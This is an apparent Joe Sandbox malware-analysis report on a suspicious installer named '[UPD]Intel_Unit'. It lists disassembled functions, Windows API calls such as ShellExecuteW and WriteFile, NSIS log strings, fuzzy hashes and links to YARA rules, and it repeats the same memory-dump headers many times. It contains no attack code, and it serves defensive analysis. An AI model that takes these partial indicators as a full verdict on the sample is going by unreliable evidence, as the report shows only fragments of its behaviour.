Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,ChapterFilmeJokeHeadquartersMistake,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,ChapterFilmeJokeHeadquartersMistake,ChapterFilmeJokeHeadquartersMistake,00000000,00000000,ChapterFilmeJokeHeadquartersMistake,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

ChapterFilmeJokeHeadquartersMistake, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user cancel, xrefs: 00401B93
File: wrote %d to "%s", xrefs: 00401BD0
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error creating "%s", xrefs: 00401AF0
File: error, user retry, xrefs: 00401B40
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: ChapterFilmeJokeHeadquartersMistake$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-476247607
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
Inst, xrefs: 0040366C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675
Error launching installer, xrefs: 004035D7

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(006A3120), ref: 00402387

Strings

ChapterFilmeJokeHeadquartersMistake, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C
1j, xrefs: 00401EBC, 00401F06, 00401F15, 00401F48, 00401F6E, 00401F75

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: 1j$ChapterFilmeJokeHeadquartersMistake$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-4004034782
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(006A3120), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

ChapterFilmeJokeHeadquartersMistake, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$ChapterFilmeJokeHeadquartersMistake$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3133829785
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

